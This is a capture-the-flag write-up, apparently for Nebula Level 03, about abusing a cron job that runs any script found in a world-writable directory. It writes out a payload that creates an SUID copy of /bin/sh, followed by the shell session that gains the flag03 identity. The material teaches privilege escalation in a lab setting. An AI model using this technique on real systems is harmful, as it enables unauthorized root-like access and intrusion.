Level 03
Exploiting a vulnerable cron job that blindly executes scripts in a writable directory.
Description
Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes.
To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03.
Approach
Upon inspecting the /home/flag03 directory, we see a script named writable.sh and a directory named writable.d. The directory writable.d is fully readable, writable, and executable by anyone (drwxrwxrwx).
Let’s take a look at the writable.sh script:
#!/bin/sh
for i in /home/flag03/writable.d/* ; do
(ulimit -t 5; bash -x "$i")
rm -f "$i"
done
This script, running regularly as a cron job by the flag03 user, loops through all files in the writable.d/ directory, executes them using bash, and then deletes them. Since we have write permissions to writable.d/, any script we place there will eventually be executed as flag03.
- We write a payload script in
/home/flag03/writable.d/. The payload will copy the/bin/shbinary and give it SUID permissions, so we can run it at our convenience.level03@nebula:/home/flag03$ echo 'cp /bin/sh /home/flag03/uflag ; chmod u+s /home/flag03/uflag' > writable.d/exp level03@nebula:/home/flag03$ chmod +x writable.d/exp - We wait a couple of minutes for the cron job to execute.
- Once the cron job runs, it executes our script, creating an SUID shell named
uflag. - We execute the SUID shell with the
-pflag (to preserve elevated privileges):./uflag -p. - We run
getflagto complete the level.
Output
level03@nebula:/home/flag03$ echo 'cp /bin/sh /home/flag03/uflag ; chmod u+s /home/flag03/uflag' > writable.d/exp
level03@nebula:/home/flag03$ chmod +x writable.d/exp
level03@nebula:/home/flag03$ ls
flagged writable.d writable.sh
... (wait for cron) ...
level03@nebula:/home/flag03$ ls
flagged uflag writable.d writable.sh
level03@nebula:/home/flag03$ ./uflag -p
uflag-4.2$ id
uid=1004(level03) gid=1004(level03) euid=996(flag03) groups=996(flag03),1004(level03)
uflag-4.2$ getflag
You have successfully executed getflag on a target account